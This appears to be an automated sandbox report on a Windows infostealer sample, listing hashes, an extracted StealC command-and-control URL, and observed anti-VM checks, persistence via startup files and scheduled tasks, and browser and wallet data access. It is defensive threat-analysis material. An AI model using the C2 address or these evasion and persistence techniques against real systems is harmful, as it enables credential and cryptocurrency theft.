Analysis
-
max time kernel
144s -
max time network
155s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
03/04/2024, 11:23
Static task
static1
Behavioral task
behavioral1
Sample
ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe
Resource
win10v2004-20240226-en
General
-
Target
ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe
-
Size
5.5MB
-
MD5
003600bc57311bd8073c1e0e04368dc3
-
SHA1
278361b1d0fc8339ede2f7119388bb384800214a
-
SHA256
ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35
-
SHA512
d859979b185e9cc1b3b41fd5531cbf17c22f6673adf4258868b5a11ed068429f464300546d437ff3582876a99fb1241aa9011182f5625c558bf8ed5be109dfe7
-
SSDEEP
49152:KIFzxLh+7KFc/rfltudWjXjGjYBJTcWIQKY6sB+gk89esANH1vcUbgkE4W4ed+aN:Fh+PL1rkPFAOFRUdSI9LwrYbN
Malware Config
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral2/memory/3816-445-0x00000240D6220000-0x00000240D9B18000-memory.dmp family_zgrat_v1 behavioral2/memory/3816-459-0x00000240F42E0000-0x00000240F43F0000-memory.dmp family_zgrat_v1 behavioral2/memory/3816-464-0x00000240F4270000-0x00000240F4294000-memory.dmp family_zgrat_v1 -
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 73weWIzju6ojmzZLpcW37C8r.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 73weWIzju6ojmzZLpcW37C8r.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\DRIVERS\SETC450.tmp MsiExec.exe File created C:\Windows\system32\DRIVERS\SETC450.tmp MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\VBoxDrv.sys MsiExec.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 73weWIzju6ojmzZLpcW37C8r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 73weWIzju6ojmzZLpcW37C8r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Drops startup file 7 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2oG3yAqGFsJakCwOUtQWdTDL.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c7EjyteoXsNdqMgFRM6yqkmV.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bEYPRnndaYhYWP8dileFRE2x.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AxAHxSs8tZxTwgY2FQCr4JnM.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rI0Kb8IzIjluzKgMuOQWpEaS.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zFrNrgU54Ea50o1ZdB1En18A.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VQsKtjWPnUS7VfojbwsJQP6u.bat regsvcs.exe -
Executes dropped EXE 21 IoCs
pid Process 2320 xHSuJrJS9vwhsvRTR3eTrJtk.exe 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 3468 6Hu1t4TRKcdzy4v1abT8sdrW.exe 4744 6Hu1t4TRKcdzy4v1abT8sdrW.exe 2972 u1sg.0.exe 4536 6Hu1t4TRKcdzy4v1abT8sdrW.exe 2292 6Hu1t4TRKcdzy4v1abT8sdrW.exe 4524 fzjvJcnlDLmOSokrFJQkEgGJ.exe 3148 zTyJM5hOpuGaK7i31uroEAKP.exe 1440 u1sg.1.exe 2584 Install.exe 1964 Install.exe 2868 73weWIzju6ojmzZLpcW37C8r.exe 4016 Assistant_108.0.5067.20_Setup.exe_sfx.exe 840 assistant_installer.exe 4616 assistant_installer.exe 948 BAECFHJEBA.exe 4924 vBjgpUK.exe 3088 9WJ4CGLG0XVmnP5KNQnINhJF.exe 4512 ce-installer_7.14.2_vbox-6.1.20.exe 1020 yYUkcpR.exe -
Loads dropped DLL 14 IoCs
pid Process 1892 6Hu1t4TRKcdzy4v1abT8sdrW.exe 3468 6Hu1t4TRKcdzy4v1abT8sdrW.exe 4744 6Hu1t4TRKcdzy4v1abT8sdrW.exe 4536 6Hu1t4TRKcdzy4v1abT8sdrW.exe 2292 6Hu1t4TRKcdzy4v1abT8sdrW.exe 2972 u1sg.0.exe 2972 u1sg.0.exe 840 assistant_installer.exe 840 assistant_installer.exe 4616 assistant_installer.exe 4616 assistant_installer.exe 3168 MsiExec.exe 2748 MsiExec.exe 2748 MsiExec.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0004000000025cef-252.dat themida behavioral2/memory/2868-256-0x00007FF770900000-0x00007FF77140A000-memory.dmp themida behavioral2/memory/2868-261-0x00007FF770900000-0x00007FF77140A000-memory.dmp themida behavioral2/memory/2868-263-0x00007FF770900000-0x00007FF77140A000-memory.dmp themida behavioral2/memory/2868-266-0x00007FF770900000-0x00007FF77140A000-memory.dmp themida behavioral2/memory/2868-267-0x00007FF770900000-0x00007FF77140A000-memory.dmp themida behavioral2/memory/2868-271-0x00007FF770900000-0x00007FF77140A000-memory.dmp themida behavioral2/memory/2868-275-0x00007FF770900000-0x00007FF77140A000-memory.dmp themida behavioral2/memory/2868-276-0x00007FF770900000-0x00007FF77140A000-memory.dmp themida behavioral2/memory/2868-354-0x00007FF770900000-0x00007FF77140A000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 9WJ4CGLG0XVmnP5KNQnINhJF.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 60 2596 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 73weWIzju6ojmzZLpcW37C8r.exe -
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json yYUkcpR.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini yYUkcpR.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: 6Hu1t4TRKcdzy4v1abT8sdrW.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\D: 6Hu1t4TRKcdzy4v1abT8sdrW.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\F: 6Hu1t4TRKcdzy4v1abT8sdrW.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\D: 6Hu1t4TRKcdzy4v1abT8sdrW.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\L: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 pastebin.com 4 pastebin.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ipinfo.io 43 api.myip.com 45 ipinfo.io 1 api.myip.com -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData yYUkcpR.exe File opened for modification C:\Windows\System32\GroupPolicy 73weWIzju6ojmzZLpcW37C8r.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.cat MsiExec.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 yYUkcpR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 yYUkcpR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 yYUkcpR.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 73weWIzju6ojmzZLpcW37C8r.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.sys MsiExec.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 yYUkcpR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content yYUkcpR.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vBjgpUK.exe File opened for modification C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.inf MsiExec.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.inf MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache yYUkcpR.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini vBjgpUK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 yYUkcpR.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 73weWIzju6ojmzZLpcW37C8r.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE yYUkcpR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies yYUkcpR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft yYUkcpR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 yYUkcpR.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 73weWIzju6ojmzZLpcW37C8r.exe File opened for modification C:\Windows\system32\DRVSTORE MsiExec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2868 73weWIzju6ojmzZLpcW37C8r.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4040 set thread context of 1144 4040 ad3276e302e34fed06a6afb6db77e6e7dd250df29a5d1695403991b174276f35.exe 83 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\lgw_postinstall.sh msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_hr_HR.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_en.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_eu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\License_en_US.rtf msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5WidgetsVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxAuthSimple.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxGuestAdditions.iso msiexec.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi yYUkcpR.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_fr.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\redhat67_ks.cfg msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ca.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_id.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5WinExtrasVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_zh_CN.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VirtualBox.chm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_de.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_hr_HR.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ru.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5OpenGLVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxGuestControlSvc.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UICommon.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDD.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetDHCP.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\sdk\install\vboxapi\VirtualBox_constants.py msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_zh_CN.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\x86\msvcp100.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\msvcr100.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_pt_BR.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_th.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\rhel5_ks.cfg msiexec.exe File created C:\Program Files (x86)\yvWovCiVU\KJfDBt.dll yYUkcpR.exe File created C:\Program Files\Oracle\VirtualBox\VBoxAuth.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDDU.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_eu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_hu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\redhat_postinstall.sh msiexec.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi yYUkcpR.exe File created C:\Program Files\Oracle\VirtualBox\VBoxRT.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_es.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ko.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\doc\UserManual.pdf msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ca.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_de.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fr.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_hu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\win_postinstall.cmd msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.sys msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetNAT.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_zh_TW.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_nl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_uk.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fa.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_it.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSupLib.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxGuestPropSvc.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_sl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxCAPI.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDbg.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.inf msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_tr.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_tr.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxC.dll msiexec.exe -
Drops file in Windows directory 18 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFDDC938B9F8F97A8C.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI5DC8.tmp msiexec.exe File created C:\Windows\Tasks\ZJggANjsYpCqsGjEe.job schtasks.exe File opened for modification C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job schtasks.exe File created C:\Windows\SystemTemp\~DFE76A6371CBBB8BD7.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIC1D2.tmp msiexec.exe File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job schtasks.exe File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job schtasks.exe File opened for modification C:\Windows\Installer\MSI4BF3.tmp msiexec.exe File created C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox msiexec.exe File opened for modification C:\Windows\Installer\e5929a6.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC} msiexec.exe File opened for modification C:\Windows\Installer\MSI4F6F.tmp msiexec.exe File opened for modification C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox msiexec.exe File created C:\Windows\Installer\e5929a6.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 3256 2320 WerFault.exe 84 4760 2972 WerFault.exe 88 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1sg.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1sg.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1sg.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u1sg.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u1sg.0.exe -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1224 schtasks.exe 1988 schtasks.exe 2592 schtasks.exe 3372 schtasks.exe 1840 schtasks.exe 1452 schtasks.exe 2156 schtasks.exe 2108 schtasks.exe 3392 schtasks.exe 2888 schtasks.exe 4376 schtasks.exe 2124 schtasks.exe 1152 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ yYUkcpR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" yYUkcpR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{85d47b70-0000-0000-0000-d01200000000}\NukeOnDelete = "0" yYUkcpR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{85d47b70-0000-0000-0000-d01200000000} yYUkcpR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" yYUkcpR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" yYUkcpR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MsiExec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" yYUkcpR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket yYUkcpR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{85d47b70-0000-0000-0000-d01200000000}\MaxCapacity = "14116" yYUkcpR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" yYUkcpR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer yYUkcpR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume yYUkcpR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates MsiExec.exe Key created 